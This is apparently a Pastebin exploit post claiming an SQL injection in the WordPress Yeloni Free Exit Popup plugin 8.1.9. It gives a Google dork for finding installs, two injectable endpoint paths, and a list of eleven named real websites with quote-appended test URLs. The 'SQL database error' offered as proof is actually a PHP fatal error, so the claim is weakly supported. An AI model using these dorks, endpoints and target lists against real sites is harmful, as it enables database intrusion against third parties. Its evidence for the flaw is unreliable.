Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : WordPress Yeloni Free Exit Popup Plugins 8.1.9 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 28/01/2019
- # Vendor Homepage : yeloni.com
- # Software Download Link : downloads.wordpress.org/plugin/yeloni-free-exit-popup.zip
- # Software Information Link : wordpress.org/plugins/yeloni-free-exit-popup/
- # Software Version : 8.1.9
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/wp-content/plugins/yeloni-free-exit-popup/wordpress/''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- ####################################################################
- # Description :
- *************
- * Yeloni is a powerful lead generation plugin that converts abandoning visitors on your website
- into subscribers using attention grabbing forms that are proven to convert.
- Choose from a wide variety of configurations, targetting options and
- widget designs to customize your popup.
- ####################################################################
- # Impact :
- **********
- * WordPress Yeloni Free Exit Popup Plugins 8.1.9 and other versions is prone to an
- SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
- data before using it in an SQL query.
- * Exploiting this issue could allow an attacker to compromise the application, read,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- If the webserver is misconfigured, read & write access to the filesystem may be possible.
- ####################################################################
- # SQL Injection Exploit :
- ***********************
- /wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=[SQL Injection]
- /wp-content/plugins/yeloni-free-exit-popup/wordpress/client-load.php?id=[SQL Injection]
- ####################################################################
- # Example Vulnerable Sites :
- ***************************
- [+] startadora.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27
- [+] podfo.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27
- [+] hviaonline.com/funds/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27
- [+] interset.digital/site/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27
- [+] speakerhead.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27
- [+] sterlingequipmentinc.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27
- [+] ewan.lublin.pl/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27
- [+] thequadgroup.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27
- [+] zenic.co.uk/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27
- [+] englishxp.co.uk/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27
- [+] rodoyo.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27
- ####################################################################
- # Example SQL Database Error :
- ******************************
- Fatal error: Using $this when not in object context in /home/axtvr/public_html
- /wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php on line 2
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment